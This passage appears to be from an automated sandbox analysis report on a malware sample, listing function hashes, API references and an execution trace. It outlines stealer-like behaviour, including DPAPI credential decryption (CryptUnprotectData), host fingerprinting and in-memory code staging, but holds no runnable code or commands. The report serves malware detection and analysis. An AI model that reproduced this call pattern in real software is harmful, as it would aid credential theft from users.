                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                        • String ID:
                                                                                                        • API String ID: 3659872527-0
                                                                                                        • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                        • Instruction ID: 77fdbdffe564f8ad1fdd23c9a2845656768185cdab1d158255dec10c04a4a29d
                                                                                                        • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                                        • Instruction Fuzzy Hash: 08E04F35540116AFCB09FF24D46056CFBA3BF45360B248255D865572E0CF345E5ACF94
                                                                                                        APIs
                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 0042F0FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorHandling__start
                                                                                                        • String ID: pow
                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                        • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                        • Instruction ID: a192877c9f0054c0872b9fb76e5ad9458d959ccc769b6dca3ba9f50539c5e518
                                                                                                        • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                        • Instruction Fuzzy Hash: 8B515C61B0431296DB117B14E90137BBBB0AB54B00FE05D7FF491423A9EE3D8CA99A4F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: s2C$s2C
                                                                                                        • API String ID: 0-1833909196
                                                                                                        • Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                        • Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
                                                                                                        • Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                        • Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89
                                                                                                        APIs
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0214895A
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 02148A13
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 3480331319-1018135373
                                                                                                        • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                        • Instruction ID: a111407e30eaae96105f17a68a509de39b890b40e8c58bdfd5aa10755e437822
                                                                                                        • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                        • Instruction Fuzzy Hash: 6741D830A40609EFCF10DF68CC44AAEBBB5BF84328F158165D91D9B391CB769915CF91
                                                                                                        APIs
                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 0-711371036
                                                                                                        • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                        • Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
                                                                                                        • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                        • Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E
                                                                                                        APIs
                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0215B31B,?,00000050,?,?,?,?,?), ref: 0215B19B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 0-711371036
                                                                                                        • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                        • Instruction ID: 168fc6eb9f9ff88336f5b366a1c8b617110e7edae7f4d515b15953387758cb53
                                                                                                        • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                        • Instruction Fuzzy Hash: 0F21A462B88124E6EB648F64ED81B977396EB40B5DF5684A4ED29D7108F732DB00C394
                                                                                                        APIs
                                                                                                        • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
                                                                                                        • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EncodersGdipImage$Size
                                                                                                        • String ID: image/png
                                                                                                        • API String ID: 864223233-2966254431
                                                                                                        • Opcode ID: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                        • Instruction ID: e538c811f89b171702b8ca366793f889c85100130971bf928fd16bdf8145c3c0
                                                                                                        • Opcode Fuzzy Hash: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                        • Instruction Fuzzy Hash: 5211737AD0410AFFCB119FA99C8149EBB7AFF45321B20027BEC10B32E0C7759E459A54
                                                                                                        APIs
                                                                                                        • SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast
                                                                                                        • String ID: <(@
                                                                                                        • API String ID: 1452528299-4189137628
                                                                                                        • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                        • Instruction ID: 966c5171ab2b841c9a1c941c3673e83940a55d69d5d5609413e6151fa891d796
                                                                                                        • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                        • Instruction Fuzzy Hash: 9711C236200216BFCF129F61DC4496ABB65BB08715B11443AFA46E6290CB70DC219BD5
                                                                                                        APIs
                                                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___std_exception_destroy
                                                                                                        • String ID: <(@$ios_base::failbit set
                                                                                                        • API String ID: 4194217158-2207043977
                                                                                                        • Opcode ID: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                        • Instruction ID: 510b138892f27541a5fc2b77746a8308bc81fd1abdf09eb2229577c7a084af3c
                                                                                                        • Opcode Fuzzy Hash: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                        • Instruction Fuzzy Hash: A7F0547260022876D2306A5ABC41B97FBCC8F51B65F24843FFD44966C2EBB8A94545EC
                                                                                                        APIs
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pContext
                                                                                                        • API String ID: 1687795959-2046700901
                                                                                                        • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                        • Instruction ID: ade17e21382ede40b1a5952a82a6294f61ec456501e49cb394cb07b135f863e7
                                                                                                        • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                        • Instruction Fuzzy Hash: E6F05939B005156BCB04EB59DC45C5EF7A9AF85760310007BFD02E3341DBB8ED068A98
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_catch
                                                                                                        • String ID: MOC$RCC
                                                                                                        • API String ID: 3886170330-2084237596
                                                                                                        • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                        • Instruction ID: c6f184ec75521e876e515d43f5ba00c5ed257f9a1274f206ffdf003c13f5d3fb
                                                                                                        • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                        • Instruction Fuzzy Hash: 90F0A970640224CFDB22EF55E00555D3BB0AF92708F8640ABFC019B261CB3C9E658BAA
                                                                                                        APIs
                                                                                                          • Part of subcall function 02159764: GetEnvironmentStringsW.KERNEL32 ref: 02159768
                                                                                                        • _free.LIBCMT ref: 0214FCB6
                                                                                                        • _free.LIBCMT ref: 0214FCBD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$EnvironmentStrings
                                                                                                        • String ID: 0TX
                                                                                                        • API String ID: 3523873077-1615691028
                                                                                                        • Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                        • Instruction ID: d1d2deac23b7649058152ee4aba9196bfa922acff67d7f1c3f21f53f7fbc6bf9
                                                                                                        • Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                        • Instruction Fuzzy Hash: DFE0E533EC5528899731232A7C00F6A0A464F81739F01026AEC38C76C2DF148907099A
                                                                                                        APIs
                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32
                                                                                                          • Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
                                                                                                          • Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4
                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46
                                                                                                          • Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
                                                                                                          • Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                        • String ID: F@
                                                                                                        • API String ID: 2118720939-885931407
                                                                                                        • Opcode ID: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                                                        • Instruction ID: d8e2bd5d7c2d17c0e6b385c3bfe6b7baa890588314637a55e0c2b4eea0cd1ccb
                                                                                                        • Opcode Fuzzy Hash: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                                                        • Instruction Fuzzy Hash: 80F058B14002069BEB20AF55C81279DB361FF80715F50843FE945BB2C1CB7CAA44CB8C
                                                                                                        APIs
                                                                                                        • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                        • String ID: jB$nB
                                                                                                        • API String ID: 3275300208-1818383504
                                                                                                        • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                        • Instruction ID: 59cecdb31c0df98e9f45a8df7d3f0483270f31b7733147966a644d233ca5dfda
                                                                                                        • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                        • Instruction Fuzzy Hash: 20D05E3228C3252AE3346E5DB8017C6BAD88F01764F50C03FF94896682CFB9688882DC
                                                                                                        APIs
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004212D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pThreadProxy
                                                                                                        • API String ID: 1687795959-3651400591
                                                                                                        • Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                        • Instruction ID: 8e926060578bb0aca53d69262477d947a6492ed66be404d99a0d2172ee8e52cc
                                                                                                        • Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                        • Instruction Fuzzy Hash: DFD05B31E0020866D700EBB5D806E4E77E85B10708F91457B7D15E6143EB78E5088AAC
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CommandLine
                                                                                                        • String ID: `%W
                                                                                                        • API String ID: 3253501508-2859075202
                                                                                                        • Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                        • Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
                                                                                                        • Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                        • Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
                                                                                                        • GetLastError.KERNEL32 ref: 0042AF1E
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1717984340-0
                                                                                                        • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                        • Instruction ID: b4e4fd9a0f0a1cd091c58849f1b07b04ac885d72683c28cc61e5c451b31866ac
                                                                                                        • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                        • Instruction Fuzzy Hash: AF413870700222AFCB229F65EA44A6BBBA4EF01310F96416FFC5597291D73C8D11C75A
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02122AA3,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02122AA3,00000000), ref: 0214B177
                                                                                                        • GetLastError.KERNEL32 ref: 0214B185
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02122AA3,00000000), ref: 0214B1E0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1717984340-0
                                                                                                        • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                        • Instruction ID: 59debe872c208a64b9c695039dded89a41d4b5e108d1b9a5afd8aae4826330a9
                                                                                                        • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                        • Instruction Fuzzy Hash: B541E531E88216AFCB258F64D844BAE7BB5EF01729F154169EC5DA71A0DF30EB01CB50

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.9%
                                                                                                        Dynamic/Decrypted Code Coverage:20%
                                                                                                        Signature Coverage:40.6%
                                                                                                        Total number of Nodes:170
                                                                                                        Total number of Limit Nodes:18
                                                                                                        execution_graph 26240 408880 26242 40888f 26240->26242 26241 408ab5 ExitProcess 26242->26241 26243 4088a4 GetCurrentProcessId GetCurrentThreadId 26242->26243 26252 408aa7 26242->26252 26244 4088ca 26243->26244 26245 4088ce SHGetSpecialFolderPathW GetForegroundWindow 26243->26245 26244->26245 26247 408974 26245->26247 26254 43eb20 26247->26254 26249 408a9e 26249->26252 26250 4089cf 26250->26249 26251 408a99 26250->26251 26257 40ba80 FreeLibrary FreeLibrary 26251->26257 26258 440240 FreeLibrary 26252->26258 26259 441850 26254->26259 26256 43eb2a RtlAllocateHeap 26256->26250 26257->26249 26258->26241 26260 441870 26259->26260 26260->26256 26260->26260 26327 415720 26328 415740 26327->26328 26328->26328 26373 443190 26328->26373 26330 415882 26331 4158ab 26330->26331 26335 415ad2 26330->26335 26336 415ab7 26330->26336 26338 415b37 26330->26338 26340 4158ea 26330->26340 26381 443440 LdrInitializeThunk 26330->26381 26331->26335 26331->26336 26331->26338 26331->26340 26382 4434d0 26331->26382 26335->26336 26389 4402c0 LdrInitializeThunk 26335->26389 26338->26338 26339 443190 LdrInitializeThunk 26338->26339 26342 415c8d 26339->26342 26388 408ca0 EntryPoint 26340->26388 26342->26336 26344 415d02 26342->26344 26346 415d3e 26342->26346 26390 443440 LdrInitializeThunk 26342->26390 26345 4434d0 LdrInitializeThunk 26344->26345 26344->26346 26345->26346 26359 415dbe 26346->26359 26391 4402c0 LdrInitializeThunk 26346->26391 26348 416087 26349 416498 26348->26349 26350 41647e 26348->26350 26352 41632f 26348->26352 26394 419840 FreeLibrary FreeLibrary RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26350->26394 26352->26349 26353 4163b2 26352->26353 26371 4164c2 26352->26371 26393 41bba0 EntryPoint RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26353->26393 26354 41605d CryptUnprotectData 26354->26348 26354->26352 26356 4160a8 26354->26356 26392 408ca0 EntryPoint 26356->26392 26357 416483 26357->26349 26370 41687e 26357->26370 26396 4402c0 LdrInitializeThunk 26357->26396 26359->26348 26359->26354 26359->26356 26361 41672c 26395 41bba0 EntryPoint RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26361->26395 26363 4168b7 26399 4402c0 LdrInitializeThunk 26363->26399 26364 416bd9 26365 416b4e 26365->26363 26365->26364 26368 416c8a 26365->26368 26398 408ca0 EntryPoint 26368->26398 26370->26363 26370->26364 26370->26365 26370->26368 26397 4402c0 LdrInitializeThunk 26370->26397 26371->26336 26371->26361 26377 4432f0 26371->26377 26375 4431b0 26373->26375 26374 443298 26374->26330 26375->26374 26400 4402c0 LdrInitializeThunk 26375->26400 26378 443310 26377->26378 26379 4433ee 26378->26379 26401 4402c0 LdrInitializeThunk 26378->26401 26379->26371 26381->26331 26383 4158db 26382->26383 26384 4434e9 26382->26384 26383->26335 26383->26336 26383->26338 26383->26340 26384->26383 26402 4402c0 LdrInitializeThunk 26384->26402 26386 443538 26386->26383 26403 4402c0 LdrInitializeThunk 26386->26403 26388->26336 26389->26336 26390->26344 26391->26359 26392->26348 26393->26336 26394->26357 26395->26336 26396->26370 26397->26365 26398->26364 26399->26363 26400->26374 26401->26379 26402->26386 26403->26383 26261 43eb40 26262 43eb53 26261->26262 26263 43eb55 26261->26263 26264 43eb5a RtlFreeHeap 26263->26264 26265 20f0005 26270 20f092b GetPEB 26265->26270 26267 20f0030 26271 20f003c 26267->26271 26270->26267 26272 20f0049 26271->26272 26286 20f0e0f SetErrorMode SetErrorMode 26272->26286 26277 20f0265 26278 20f02ce VirtualProtect 26277->26278 26280 20f030b 26278->26280 26279 20f0439 VirtualFree 26284 20f05f4 LoadLibraryA 26279->26284 26285 20f04be 26279->26285 26280->26279 26281 20f04e3 LoadLibraryA 26281->26285 26283 20f08c7 26284->26283 26285->26281 26285->26284 26287 20f0223 26286->26287 26288 20f0d90 26287->26288 26289 20f0dad 26288->26289 26290 20f0dbb GetPEB 26289->26290 26291 20f0238 VirtualAlloc 26289->26291 26290->26291 26291->26277 26404 40cfec 26405 40d010 26404->26405 26408 43b870 26405->26408 26407 40d175 26407->26407 26409 43b8b0 26408->26409 26409->26409 26410 43bc86 CoCreateInstance 26409->26410 26411 43c217 26410->26411 26412 43bcda SysAllocString 26410->26412 26413 43c227 GetVolumeInformationW 26411->26413 26415 43bd6a 26412->26415 26422 43c249 26413->26422 26416 43bd72 CoSetProxyBlanket 26415->26416 26417 43c206 SysFreeString 26415->26417 26418 43bd92 SysAllocString 26416->26418 26419 43c1fc 26416->26419 26417->26411 26421 43be80 26418->26421 26419->26417 26421->26421 26423 43becf SysAllocString 26421->26423 26422->26407 26425 43bef2 26423->26425 26424 43c1e7 SysFreeString SysFreeString 26424->26419 26425->26424 26426 43c1dd 26425->26426 26427 43bf39 VariantInit 26425->26427 26426->26424 26429 43bf90 26427->26429 26428 43c1cc VariantClear 26428->26426 26429->26428 26430 4406eb 26431 44072e 26430->26431 26432 44070c 26430->26432 26432->26431 26434 4402c0 LdrInitializeThunk 26432->26434 26434->26431 26435 404d30 26438 404dc0 26435->26438 26439 404e0d 26438->26439 26440 404dac 26439->26440 26442 405ab0 EntryPoint 26439->26442 26442->26440 26292 40ab12 26293 40ab22 26292->26293 26294 40ab3d WSAStartup 26293->26294 26295 40df92 CoInitializeSecurity 26443 421370 26444 4213d8 26443->26444 26445 42137e 26443->26445 26449 421490 26445->26449 26450 4214a0 26449->26450 26450->26450 26451 4432f0 LdrInitializeThunk 26450->26451 26452 42157f 26451->26452 26296 40e3d3 CoInitializeEx CoInitializeEx 26297 442390 26299 4423b0 26297->26299 26298 442439 26299->26298 26301 4402c0 LdrInitializeThunk 26299->26301 26301->26298 26453 4404b1 GetForegroundWindow 26454 4404ce 26453->26454 26302 560000 26305 560006 26302->26305 26306 560015 26305->26306 26309 5607a6 26306->26309 26310 5607c1 26309->26310 26311 5607ca CreateToolhelp32Snapshot 26310->26311 26312 5607e6 Module32First 26310->26312 26311->26310 26311->26312 26313 5607f5 26312->26313 26315 560005 26312->26315 26316 560465 26313->26316 26317 560490 26316->26317 26318 5604a1 VirtualAlloc 26317->26318 26319 5604d9 26317->26319 26318->26319 26319->26319 26320 440cde 26321 440ce8 26320->26321 26323 440dae 26321->26323 26326 4402c0 LdrInitializeThunk 26321->26326 26325 4402c0 LdrInitializeThunk 26323->26325 26325->26323 26326->26323 26460 4409b8 26461 4409d0 26460->26461 26462 440a3e 26461->26462 26466 4402c0 LdrInitializeThunk 26461->26466 26464 440a8e 26462->26464 26467 4402c0 LdrInitializeThunk 26462->26467 26466->26462 26467->26464

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
